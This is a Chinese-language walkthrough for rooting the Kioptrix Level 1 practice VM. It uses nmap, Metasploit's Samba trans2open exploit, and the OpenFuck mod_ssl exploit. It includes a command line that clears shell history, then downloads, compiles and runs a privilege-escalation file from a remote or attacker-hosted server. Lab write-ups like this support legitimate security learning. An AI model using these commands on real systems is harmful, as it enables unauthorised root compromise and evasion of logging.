目标:Kioptrix Level 1[VMWare]
本机环境:BackTrack5 RC3[VMware](192.168.74.145)
网关:192.168.74.254
使用工具:nmap
#1:查看 Kioptrix 在内网的IP地址。
工具:nmap
命令:nmap 192.168.74.0/24 –n –sP -sn
得到IP:192.168.74.147
#2:查看 开放端口。
工具:nmap
得到开放端口:
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status (status V1) 1 (rpc #100024)
发现有Samba,还有Apache OpenSSL。
下面会有两种方案Samba #3-A,和Apache OpenSSL #3-B
#3-A:利用Samba溢出
工具:metasploit
命令:msfconsole
先search下
命令:use exploit/linux/samba/trans2open
命令:set PAYLOAD linux/x86/shell_bind_tcp
命令:set rhost 192.168.74.147
show options 查看一下
配置完毕,exploit~
命令whoami
返回root
溢出成功!
#3-B:利用Apache OpenSSL漏洞溢出。
工具:Nikto
命令:cd /pentest/web/nikto
./nikto.pl –host 192.168.74.147 –Display 124
执行的时间很长。耐心等待~
发现可用信息:
mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
打开 Exploit-DB 网站,搜索Apache Openssl
下载 764.c
编译,此时发现编译不成功,仔细看缺少的是 rc4和md5相关信息。
在头文件中添加
#include
#include
Exploit的命令在下面,#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
需要wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c
还是自己下载一个。本机作为服务器,从内网wget吧。
将此行改为#define COMMAND2 "unset HISTFILE; cd /tmp; wget 192.168.74.145/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
下载 一个ptrace-kmod.c
复制到 /var/www/目录下
开启Apache服务
编译方法在 注释中gcc -o OpenFuck OpenFuck.c –lcrypto
命令:gcc –o OpenFuck 764.c –lcrypto
执行 ./OpenFuck 看到提示信息
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
命令:./OpenFuck 0x6b 192.168.74.147
命令whoami
返回root
溢出成功!
#4:执行mail查看邮件
命令:mail
1
成功~
第一次搞这个。。
参考了linux520的教程,和springemp大牛的教程。